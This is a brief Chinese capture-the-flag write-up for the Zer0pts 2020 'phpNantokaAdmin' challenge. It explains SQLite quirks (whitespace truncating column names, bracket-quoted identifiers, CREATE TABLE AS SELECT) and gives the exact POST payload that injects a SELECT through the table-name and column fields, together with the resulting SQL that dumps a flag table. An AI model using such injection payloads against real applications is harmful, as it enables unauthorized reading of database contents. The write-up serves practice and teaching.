刷题记录：[Zer0pts2020]phpNantokaAdmin

题目复现链接：https://buuoj.cn/challenges
参考链接：Zer0pts CTF 2020

sqlite bypass技巧

• select的时候，当列名用空白字符隔开时，sqlite只会把空格之前的字符当做列名，并且忽视空格后的字符
  

• []和'、"、`、一样可以包裹列名
  
  

• sqlite可以create table ... as select ...
  
  

解题

posttable_name=[aaa]as select [flag_2a2d04c3][&columns[0][name]=]from flag_bf1811da;&columns[0][type]=2
最后拼接出来的sql语句是

create table [aaa] as select [flag_2a2d04c3][(dummy1 TEXT, dummy2 TEXT,`]from flag_bf1811da;`2);